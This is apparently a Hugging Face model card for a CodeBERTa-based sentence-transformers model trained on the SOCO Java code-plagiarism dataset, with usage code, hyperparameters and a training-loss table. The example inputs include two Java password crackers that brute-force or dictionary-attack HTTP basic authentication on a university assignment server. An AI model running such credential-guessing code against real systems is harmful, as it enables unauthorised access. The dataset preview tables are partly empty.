Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper
•
1908.10084
•
Published
•
9
This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_train_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERTa-Softmax-PairClass")
# Run inference
sentences = [
'\n\n\n\n\n\n\nimport java.io.*;\nimport java.lang.Object;\n\npublic class WatchDog\n{\n\n \n public static void main(String args[])throws Exception\n {\n Process p1,p2,p3,p4,p5;\n \n for(;;)\n {\n \n\n String s1[] = {"/usr/local//tcsh", "-c", "mailx -s \\"Part 2-Assignment2 \\" < change.html"};\n String s2[] = {"/usr/local//tcsh", "-c", "mv www.cs.rmit.edu./images/*.* predir"};\n String s3[] = {"/usr/local//tcsh", "-c", "mv www.cs.rmit.edu./students/*.* predir"};\n String s4[] = {"/usr/local//tcsh", "-c", "mv www.cs.rmit.edu./images/*.* postdir"};\n String s5[] = {"/usr/local//tcsh", "-c", "mv www.cs.rmit.edu./students/*.* postdir"};\n String s6[] = {"/usr/local//tcsh", "-c", "diff copy1 copy2 > diff.html"};\n\n\n Process p = Runtime.getRuntime().exec("mkdir predir");\n p.waitFor();\n Process p1 = Runtime.getRuntime().exec("mkdir postdir");\n p1.waitFor();\n\n \n p1 = Runtime.getRuntime().exec("wget -p --convert-links http://www.cs.rmit.edu./students/");\n p1.waitFor();\n\n Process q2 = Runtime.getRuntime().exec(s2);\n q2.waitFor();\n Process q3 = Runtime.getRuntime().exec(s3);\n q2.waitFor();\n\n \n Thread.sleep(86400000);\n\n p3 = Runtime.getRuntime().exec("wget -p --convert-links http://www.cs.rmit.edu./students/");\n p3.waitFor();\n\n Process q4 = Runtime.getRuntime().exec(s4);\n q4.waitFor();\n Process q5 = Runtime.getRuntime().exec(s5);\n q5.waitFor();\n\n try\n {\n String str;\n p4 = Runtime.getRuntime().exec(s6);\n DataInputStream inp1 = new DataInputStream(p4.getInputStream());\n p4.waitFor();\n \n System.out.println("The WatchDog - Returns 0 if change else 1");\n System.out.println("Value :" + p4.exitValue());\n try\n {\n while ((str = inp1.readLine()) != null)\n {\n System.out.println(str);\n }\n }\n catch (IOException e)\n {\n System.exit(0);\n }\n\n }\n catch(FileNotFoundException e )\n {\n e.printStackTrace();\n }\n\n BufferedReader in = new BufferedReader(new FileReader("change.html"));\n \n if (in.readLine() != null)\n {\n\n try\n {\n String 
str1;\n p5 = Runtime.getRuntime().exec(s1);\n DataInputStream inp2 = new DataInputStream(p5.getInputStream());\n p5.waitFor();\n try\n {\n while ((str1 = inp2.readLine()) != null)\n {\n System.out.println(str1);\n }\n }\n catch (IOException e1)\n {\n System.exit(0);\n }\n\n }\n catch(FileNotFoundException exp)\n {\n exp.printStackTrace();\n }\n\n }\n }\n }\n}\n\n',
'import java.io.*;\nimport java.util.*;\nimport java.net.*;\nimport java.net.Authenticator;\n\n\npublic class BruteForce\n{\n\n\tprivate String result ="";\n\n\tpublic class customAuthenticator extends Authenticator {\n\t public customAuthenticator(String passwd)\n {\n this.pass = passwd;\n }\n\n\t protected PasswordAuthentication getPasswordAuthentication()\n {\n\t return new PasswordAuthentication("",pass.toCharArray());\n }\n public String pass;\n }\n\n public BruteForce() {\n java.util.Date d = java.util.Calendar.getInstance().getTime();\n System.out.println(d.toString());\n\t\tchar words[] = { \'a\',\'b\',\'c\',\'d\',\'e\', \'f\', \'g\', \'h\', \'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\n\t\t\t\t\t\t\t \'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\', \'A\',\'B\',\'C\',\'D\',\'E\', \'F\', \'G\',\n\t\t\t\t\t\t\t \'H\', \'I\',\'J\',\'K\',\'L\',\'M\',\'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\'};\n\n\t\tString record = null;\n\n\n\n String url = "http://sec-crack.cs.rmit.edu./SEC/2/";\n\n\t\tchar pass[] = {\'x\',\'x\',\'x\'};\n\t\tint count=1;\n\t\tString passwd=new String();\n HttpURLConnection connection = null;\n URL u = null;\n\n try\n {\n u = new URL(url);\n\n }\n catch (MalformedURLException e)\n {\n }\n\n for(int a=0;a<words.length;a++)\n {\n for(int b=0;b<words.length;b++)\n {\n for(int c=0;c<words.length;c++)\n {\n pass[0]=words[a];\n pass[1]=words[b];\n pass[2]=words[c];\n passwd=passwd.copyValueOf(pass,0,3);\n System.out.println(count+ " ) " + passwd);\n count++;\n try\n {\n\n connection = (HttpURLConnection) u.openConnection();\n Authenticator.setDefault(new customAuthenticator(passwd));\n\n if (connection.getResponseCode()!=401)\n {\n System.out.print("The password is : "+passwd);\n System.out.println();\n java.util.Date d1 = java.util.Calendar.getInstance().getTime();\n System.out.println(d1.toString());\n System.out.println("\\ntime taken in seconds:"+ (d1.getTime() - d.getTime())/1000+"\\n");\n\n 
System.exit(0);\n }\n else\n {\n }\n connection.disconnect();\n }\n catch (IOException e)\n {\n System.out.println(e);\n }\n }\n }\n }\n }\n\n\tpublic static void main(String[] args)\n\t{\n\n\n\t\tBruteForce = new BruteForce();\n\t}\n}',
'import java.Object;\nimport java.io.*;\nimport java.String;\nimport java.util.*;\n\nclass Dictionary{\n\n public static void main(String [] args){\n try\n {\n Date d = new Date();\n String line1="";\n String ps="";\n String file1 = "words.txt";\n String file2 = "index.html";\n String endline="Authorization failed.";\n String [] cmd = new String[4];\n cmd[0] = "wget";\n cmd[1] = "--http-user=";\n cmd[3] = "http://sec-crack.cs.rmit.edu./SEC/2/";\n\n FileReader fr1 = new FileReader(file1);\n BufferedReader in1 = new BufferedReader(fr1);\n while((line1 = in1.readLine())!=null)\n {\n try{\n cmd[2] = connect(line1);\n Runtime.getRuntime().exec(cmd);\n if(line1.length()==3)\n ps = line1;\n System.out.println(cmd[2]);\n File f = new File(file2);\n if(f.exists())\n {\n System.out.println("password: " + ps);\n break;\n }\n }\n catch(IOException ex)\n {\n System.out.println("hello1");\n }\n\n }\n Date end = new Date();\n System.out.println(d.toString());\n System.out.println(end.toString());\n System.out.println("Seconds: " + (end.getSeconds()-d.getSeconds()));\n }\n\n catch(IOException e)\n {\n System.out.println("hello,didnt find file.");\n }\n }\n public static String connect(String str1)\n {\n char data[] = {\'-\',\'-\',\'h\',\'t\',\'t\',\'p\',\'-\',\'p\',\'a\',\'s\',\'s\',\'w\',\'d\',\'=\'};\n String str = new String(data);\n return str + str1;\n }\n\n}\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Columns: label, text_1, and text_2

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
import java.io.*; |
|
0 |
|
|
0 |
|
import java.io.*; |
SoftmaxLoss

Columns: label, text_1, and text_2

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
import java.io.*; |
|
0 |
|
import java.net.*; |
0 |
import java.io.*; |
|
SoftmaxLoss

Non-default hyperparameters:
- eval_strategy: steps
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- num_train_epochs: 1
- warmup_ratio: 0.1
- fp16: True

All hyperparameters:
- overwrite_output_dir: False
- do_predict: False
- eval_strategy: steps
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 5e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1.0
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.1
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: True
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: proportional

| Epoch | Step | Training Loss | Validation Loss |
|---|---|---|---|
| 0.0532 | 100 | 0.0842 | 0.0238 |
| 0.1064 | 200 | 0.0111 | 0.0203 |
| 0.1596 | 300 | 0.0061 | 0.0253 |
| 0.2128 | 400 | 0.0243 | 0.0203 |
| 0.2660 | 500 | 0.0311 | 0.0209 |
| 0.3191 | 600 | 0.0212 | 0.0203 |
| 0.3723 | 700 | 0.0137 | 0.0237 |
| 0.4255 | 800 | 0.03 | 0.0199 |
| 0.4787 | 900 | 0.0104 | 0.0195 |
| 0.5319 | 1000 | 0.0141 | 0.0201 |
| 0.5851 | 1100 | 0.0214 | 0.0186 |
| 0.6383 | 1200 | 0.0151 | 0.0192 |
| 0.6915 | 1300 | 0.0219 | 0.0185 |
| 0.7447 | 1400 | 0.0152 | 0.0184 |
| 0.7979 | 1500 | 0.0082 | 0.0192 |
| 0.8511 | 1600 | 0.0128 | 0.0182 |
| 0.9043 | 1700 | 0.0155 | 0.0172 |
| 0.9574 | 1800 | 0.0102 | 0.0174 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
Base model
huggingface/CodeBERTa-small-v1